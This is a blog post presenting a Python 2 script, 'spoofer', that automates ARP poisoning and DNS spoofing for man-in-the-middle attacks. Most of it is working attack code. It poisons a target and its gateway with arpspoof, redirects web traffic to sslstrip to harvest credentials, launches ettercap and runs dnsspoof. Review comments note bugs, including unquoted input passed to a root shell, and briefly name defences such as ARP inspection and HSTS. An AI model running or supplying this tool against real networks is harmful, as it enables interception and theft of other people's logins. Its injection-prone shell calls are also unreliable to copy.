Spoofer – Automated arp / dns poisoning
I have knocked up a little menu-driven Python tool called spoofer. Spoofer takes the leg work out of getting a system set up for man-in-the-middle attacks.
Here is the code:
#!/usr/bin/python
#
# Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip}
# eg: ./spoofer.py waln0 10.0.0.10 10.0.0.1
#
# NOTE(review): the usage line above does not match the code below. Only
# argv[1] (the adapter) is read from the command line; the two IP addresses
# are asked for interactively with raw_input().
#
# Requirements:
# dsniff (arpspoof, dnsspoof) - sslstrip - ettercap
#
# Python 2 script (print statements, raw_input). It refuses to run unless
# getuid() == 0, and every external command goes through os.system(), i.e. a
# shell, with the adapter name and the typed-in addresses %-formatted into the
# command string without validation or quoting. Anything typed at those
# prompts is therefore interpreted by a root shell.
#
# NOTE(review): from the defending side, the ARP stage is what controls such
# as dynamic ARP inspection or ARP-table monitoring are meant to catch, and
# HSTS is the usual protection against the port-80 redirect stage.
#
from os import system, getuid
from sys import argv, exit
from time import sleep

class colours:
    # ANSI escape sequences used to highlight console messages
    bold = '\033[1m'
    red = '\033[31m'
    green = '\033[32m'
    reset = '\033[0;0m'

def arp_cleanup():
    """Undo the host changes made by menu option 1, then exit the script.

    Reads the module-level name `adapter`, which is only assigned in the main
    block below, so this must not be called before that assignment.
    """
    # stop arpspoof
    # killall matches by process name, so every arpspoof process on the host
    # is stopped, not only the one this script started
    print "\n[+] Stopping arpspoof"
    system('killall arpspoof')
    sleep(1)
    # set ip_forward to 0
    # NOTE(review): the previous value is never saved, so a host that already
    # had forwarding enabled is left with it disabled
    print "[+] Stopping IPv4 forwarding"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    # clear iptables rules
    # despite the "Flushing" message this deletes (-D) only the single
    # PREROUTING redirect rule that option 1 appended; other rules are kept
    print "[+] Flushing iptable rules"
    system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
    sleep(1)
    # stop ssl strip
    # the ps | grep pipeline selects every process whose ps line contains
    # "sslstrip", which includes the grep process itself
    print "[+] Stopping sslstrip\n"
    system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')')
    sleep(1)
    exit()

def dns_cleanup():
    """Wait for ENTER, undo the host changes made by menu option 2, then exit."""
    raw_input('\n[+] Hit ENTER to exit')
    # stop dnsspoof
    print "\n[+] Stopping dnsspoof"
    system('killall dnsspoof')
    sleep(2)
    # stop arpspoof
    print "[+] Stopping arpspoof"
    system('killall arpspoof')
    sleep(3)
    # set ip_forward to 0 (unconditionally, as in arp_cleanup)
    print "[+] Stopping IPv4 forwarding\n"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    exit()

# The commands below change iptables and /proc/sys, so root is required.
if getuid() != 0:
    print("You need to be root (sudo %s)" % argv[0])
else:
    if len(argv) < 2:
        system('clear')
        print("\nusage: %s adapter" % argv[0])
        print("\teg: %s eth0\n" % argv[0])
    else:
        # set some variables
        # adapter is taken from the command line as-is and later formatted
        # into shell command strings
        adapter = argv[1]
        spooftype = 0
        # NOTE(review): spooftype becomes a string and range(1,3) is a list,
        # so this condition is always true. The loop only ends through the
        # exit() call inside arp_cleanup() / dns_cleanup(); any answer other
        # than "1" or "2" just redraws the menu.
        while spooftype != range(1,3):
            system('clear')
            spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ")
            # arp spoof attack
            if spooftype == "1":
                # both addresses are free-form input with no format check
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")
                # set rules for traffic forwarding
                # appends a nat PREROUTING rule redirecting TCP port 80 that
                # arrives on the adapter to local port 10000
                print "\n[+] Setting iptable rules"
                system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
                sleep(2)
                # start arp poison on slave / gateway
                # started in the background with output discarded, so a
                # failure to start is not reported to the operator
                print "[+] Starting arpspoof"
                system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)
                # start sslstrip to harvest credentials
                # the sslstrip path is hard-coded
                print "[+] Starting sslstrip"
                system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &')
                sleep(2)
                # run ettercap against slave
                # ettercap runs in its own xterm window and is not stopped by
                # arp_cleanup(); the message below asks for it to be quit by hand
                print "[+] Starting ettercap"
                system('xterm -e ettercap -T -q -i %s &' % adapter)
                sleep(2)
                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)
                print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset
                raw_input('\n[+] Hit ENTER to exit')
                # clean up
                arp_cleanup()
            if spooftype == "2":
                # both addresses are free-form input with no format check
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")
                # arp poison slave / gateway
                print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset
                system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)
                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)
                # start dnsspoof
                # the hosts file path is hard-coded; the trailing filter
                # limits it to UDP port 53 traffic of the entered host
                system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave))
                # clean up (dns_cleanup waits for ENTER before undoing anything)
                dns_cleanup()
Spoofer relies on you having the dsniff and sslstrip tools installed (the script header also lists ettercap). This script runs out of the box on BackTrack and requires little modification for other Linux flavours.
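You really should use subprocess.call() as opposed to os.system(): os.system() hands the whole string to a shell, so the adapter name and the IP values typed at the prompts are interpolated unquoted into commands that run as root.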
the commands he is running are perfectly fine in os.system..